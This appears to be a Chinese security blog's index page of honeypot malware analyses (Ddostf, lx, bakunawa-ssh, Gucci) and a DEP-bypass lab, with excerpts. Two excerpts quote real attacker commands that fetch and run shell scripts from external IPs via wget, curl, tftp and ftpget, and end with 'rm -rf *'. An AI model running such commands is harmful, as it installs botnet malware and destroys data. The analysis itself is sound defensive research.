Larryxi's Blog

  • MalwareMustDie Ddostf 样本分析

    Jan 17, 2018

    0x00 背景

    蜜罐上又捕获一HFS上下载的恶意软件,从功能上看和之前的lx样本类似,只不过加了些Flood方法和功能,VT上一看原来都是是属于Ddostf家族。以后还是会分析些不同家族的样本,从多个角度分析样本的特征,毕竟时代在变化嘛。

    Read on →

  • MalwareMustDie lx样本分析

    Dec 31, 2017

    0x00 背景

    蜜罐上捕获到wget下载的样本,顺着网址一访问发现是用HttpFileServer v2.3k 299国产软件搭建的http服务,隐约感觉这种软件会有溢出漏洞,但也没时间去看页面就访问不了了。可以证明其下载的恶意软件出自国人之手,VT上也还没有相关的检测:

    Read on →

  • MalwareMustDie bakunawa-ssh™样本分析

    Dec 19, 2017

    0x00 背景

    最近还是通过ssh蜜罐捕获到样本,都是通过下载sh脚本文件并执行:

    wget -qO - http://198.1.70.128/1sh | sh > /dev/null 2>&1 &
rm -rf /var/run/1sh; wget -c http://198.1.70.128/1sh -P /var/run && sh /var/run/1sh &
wget -qO - http://198.1.70.128/2sh | sh > /dev/null 2>&1 &
rm -rf /tmp/2sh; wget -c http://198.1.70.128/2sh -P /tmp && sh /tmp/2sh &
curl http://198.1.70.128/3sh | sh
cd /dev/shm ; rm -rf tsh ; tftp -g 127.0.0.1 -r tsh ; sh tsh &

    Read on →

  • MalwareMustDie Gucci样本分析

    Dec 9, 2017

    0x00 背景

    在ssh蜜罐上捕获到恶意样本,执行的命令如下:

    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://212.47.239.249/justyzoat.sh; chmod 777 justyzoat.sh; sh justyzoat.sh; tftp 212.47.239.249 -c get tutftp1.sh; chmod 777 tutftp1.sh; sh tutftp1.sh; tftp -r tutftp2.sh -g 212.47.239.249; chmod 777 tutftp2.sh; sh tutftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 212.47.239.249 tuftp1.sh tuftp1.sh; sh tuftp1.sh; rm -rf justyzoat.sh tutftp1.sh tutftp2.sh tuftp1.sh; rm -rf *

    Read on →

  • 0day安全DEP绕过实验(下)

    Nov 1, 2017

    0x00 实验环境

    • 操作系统:xp sp3
    • 编译器:vs 2010
    • 编译选项:Release版本;开启DEP,关闭GS,SafeSEH,ASLR

    Read on →